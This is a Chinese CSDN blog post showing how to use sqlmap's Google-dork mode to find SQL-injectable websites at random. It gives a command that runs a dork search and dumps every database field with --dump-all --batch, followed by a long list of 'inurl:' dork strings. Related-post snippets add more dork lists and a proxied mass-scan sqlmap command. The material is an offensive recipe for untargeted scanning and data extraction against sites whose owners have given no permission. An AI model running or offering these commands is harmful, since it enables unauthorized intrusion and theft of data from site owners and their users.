注入点之Google搜索(附关键字)

最新推荐文章于 2021-04-13 15:50:00 发布
最新推荐文章于 2021-04-13 15:50:00 发布
阅读量2.6k 收藏 10
点赞数 1
分类专栏: SQLMAP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42452926/article/details/104799479
版权 

利用Google Dorks字符串找到可注入的网站

sqlmap.py -g(g即为谷歌的意思) 加上搜索引擎的语言(即google关键字)

使用示例:
1.
sqlmap.py -g "inurl:php?id="

2.
sqlmap.py -g "inurl:php?id=" --dump-all --batch

          google搜索注入点 自动跑出所有字段


部分关键字(根据自己需要的去使用):
inurl:item_id=	
inurl:review.php?id=	
inurl:hosting_info.php?id=
inurl:newsid=	
inurl:iniziativa.php?in=	
inurl:gallery.php?id=
inurl:trainers.php?id=	
inurl:curriculum.php?id=	
inurl:rub.php?idr=
inurl:news-full.php?id=	
inurl:labels.php?id=	
inurl:view_faq.php?id=
inurl:news_display.php?getid=	
inurl:story.php?id=	
inurl:artikelinfo.php?id=
inurl:index2.php?option=	
inurl:look.php?ID=	
inurl:detail.php?ID=
inurl:readnews.php?id=	
inurl:newsone.php?id=	
inurl:index.php?=
inurl:top10.php?cat=	
inurl:aboutbook.php?id=	
inurl:profile_view.php?id=
inurl:newsone.php?id=	
inurl:material.php?id=	
inurl:cat
最低0.47元/天 解锁文章
怪獸哪裡跑
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 4371
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻到的漏洞在漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
SQL注入
weixin_30629977的博客
09-05 1857
SQL注入 如果要对一个网站进行SQL注入攻击,首先就需要到存在SQL注入漏洞的地方,也就是寻所谓的注入。可能的SQL注入一般存在于登录页面、查页面或添加页面等用户可以查或修改数据的地方。   最常用的寻SQL注入的方法,是在网站中寻如下形式的页面链接:http://www.xxx.com/xxx.asp?id=YY ...
啊D注入关键字
03-14
啊D注入关键字,最全关键字
SQL注入搜索关键字
weixin_34355881的博客
03-15 1556
注入关键字个人从网上和一些教程钟归纳了一些批量搜索注入关键字,分享给大家使用,有些关键字还可以扩展,寻注入靠的不是其他,就是自己的想象力!下面的关键字可以随意组合。NewsInfo.asp?id=otherinfo.asp?id=info.asp?id=news_show.asp?id=showhf.asp?id=detailshow.asp?ID...
python注入_利用Python脚本通过搜索引擎批量寻利用注入
weixin_39857876的博客
12-21 198
思路 :利用现有的搜索引擎API以及GoogleHacking技术 , 批量进行关键字查询和注入检测分为三步 :URL采集对采集到的不可能的URL进行过滤 , 例如静态的页面等注入检测参考资料 :实现 :URL采集 :利用Bing提供的免费API , 进行URL采集 : (Bing.py)#!/usr/bin/env python#coding:utf8import requestsimpor...
google 搜索sql注入
weixin_33810006的博客
10-15 926
2019独角兽企业重金招聘Python工程师标准>>> ...
利用谷歌搜索SQL注入漏洞关键词
12-16
利用谷歌搜索SQL注入漏洞关键词 目标关键字+inurl:id 英语字母及单词+inurl:id 网站域名+inurl:id 阿拉伯数字+inurl:id inurl:asp?id= inurl:Article_Print.asp? EnCompHonorBig.asp?id=随便加个数字 showproduct....
SQL注入原理
09-07
网站检测系列教程第三课:利用百度谷歌关键字批量检测网站 关键字:inurl:asp?articleid= ----------------------------------- 关键字:网站建设公司企业网站管理系统 后缀: admin/login.asp -------------------...
iPersonal:iPersonal是用于用户的个人仪表板,用于存储他们的书签,大头针,待办事项,便笺,日记,费用,向其添加标签,基于关键字,标签,标题跨实体搜索
05-08
#iPersonal iPersonal是一个个人仪表板,用户可以使用其存储书签,大头针,待办事项,便笺,日记,费用,为其添加标签,基于关键字,标签,标题在各个实体之间进行搜索(在chrome上效果最好:-)) (灵感来自...
搜索引擎优化工具(Seo Panel) 3.11.0.zip
05-23
Seo Panel是一个管理您网站的搜索引擎优化的完全控制面板。它包含了许多SEO工具,加强跟踪您的网站的性能,您还可以自己开发插件。 Seo Panel 3.11.0 更新日志:2017-07-19新功能1)Google页面速度检测器-使用API将...
整理出来的SQL注入关键字
03-06
整理出来的关于SQL注入时所需要的关键字,很全面,覆盖了很多,包括asp,php等等
百度批量注入拿shell
05-22
百度批量注入拿shell
sql注入关键字大全
07-27
sql注入关键字大全,包括sqlserve , odbc,等
Seo Panel 免费站长工具 v3.11.0.zip
07-07
3)修复所有的sql注入问题; 4)创建更多的常用功能,用于数据库管理和验证; 5)电子邮件内容改进。 Seo Panel 免费站长工具简介 Seo Panel是一个网站搜索引擎优化管理的完整控制面板。它包含了多个SEO工具来...
谷歌注入搜索
热门推荐
血色苍穹
11-02 2万+
nurl:asp?id= inurl:Article_Print.asp? inurl:EnCompHonorBig.asp?id=随便加个数字 inurl:showproduct.asp?id=随便加个数字 inurl:ManageLogin.asp inurl:EnCompHonorBig.asp?id= 随便加个数字 inurl: (asp?=数字) inurl: (php?=数字) inu...
我的注入关键字
Ming
02-25 3229
注入 关键字 inurl:CompHonorBig.asp?id= Article_print.asp?ArticleID= inurl:conpany.asp?id= inurl:products.asp?id= inurl:newsSHOw.asp?id= inurl:(asp=XXX?)  site:jp搜索日本网站 inurl:asp?id=  cat.asp?cat
php常用的关键字,PHP注入常用关键字
weixin_30480281的博客
03-21 467
inurl:index.php?id=inurl:trainers.php?id=inurl:buy.php?category=inurl:article.php?ID=inurl:play_old.php?id=inurl:declaration_more.php?decl_id=inurl:pageid=inurl:games.php?id=inurl:page.php?file=inurl:...
Sqmap 利用 Google 批量扫描注入
tomyyyyy
04-13 2274
Sqmap 利用 Google 批量扫描注入 sqlmap -g "inurl:php?id=10 site:.com.cn" --proxy "http://127.0.0.1:1080" --threads 5 --batch --answer "extending=N,follow=N,keep=N,exploit=n" --smart -g #谷歌搜索 –pr...
mysql注入关键字_Mysql注入在limit关键字后面的利用方法
weixin_35249119的博客
01-19 246
Post Views:5,294描写sql注入利用方法的文章数不胜数,本文将描述一种比较特殊的场景。细节在一次测试中,我碰到了一个sql注入的问题,在网上没有搜到解决办法,当时的注入是在limit关键字后面,数据库是MySQL5.x,SQL语句类似下面这样:SELECTfieldFROMtableWHEREid>0ORDERBYidLIMIT【注入】问题的关键在于...
谷歌搜索sql注入
最新发布
11-05
SQL注入是一种常见的网络安全攻击方式,利用这种漏洞,黑客可以通过在用户输入的数据中注入恶意SQL语句来达到控制或者篡改数据库的目的。而谷歌搜索SQL注入是指使用谷歌搜索引擎来查当前互联网上可能存在SQL注入漏洞的网站或者系统。下面就如何用谷歌搜索SQL注入进行简要介绍。 首先,我们可以在谷歌搜索栏中输入“SQL注入”或者“SQL注入”,然后搜索按钮。谷歌将会返回一系列相关的搜索结果。我们可以击其中任意一个结果,查看该网站是否具有SQL注入漏洞。 另外,我们还可以使用一些针对SQL注入漏洞的特定搜索语法来精确地搜索这些漏洞。例如,我们可以使用“inurl:php?id=”的搜索语法,这样谷歌就会返回具有url中包含“php?id=”的网站,其中“id=”是常见的SQL注入漏洞表现形式之一。 此外,还可以使用其他关键词,比如"SQL注入语句"、“SQL注入漏洞利用”等来搜索。通过这些关键词的组合使用,我们可以更方便地寻到存在SQL注入漏洞的网站或者系统。 在使用谷歌搜索SQL注入的过程中,我们需要注意一些道德和法律问题。首先,我们应该遵守法律法规,不得擅自利用这些漏洞进行恶意攻击或者非法活动。其次,我们应该明确自己的行为目的,如果是为了提高网络安全意识或者测试自己的网站安全性,我们需要提前取得相关授权,并在合法的范围内进行行动。 总之,通过谷歌搜索SQL注入可以帮助我们到存在SQL注入漏洞的网站或者系统,但我们必须遵守法律法规和道德规范,不能滥用这些信息来进行非法活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值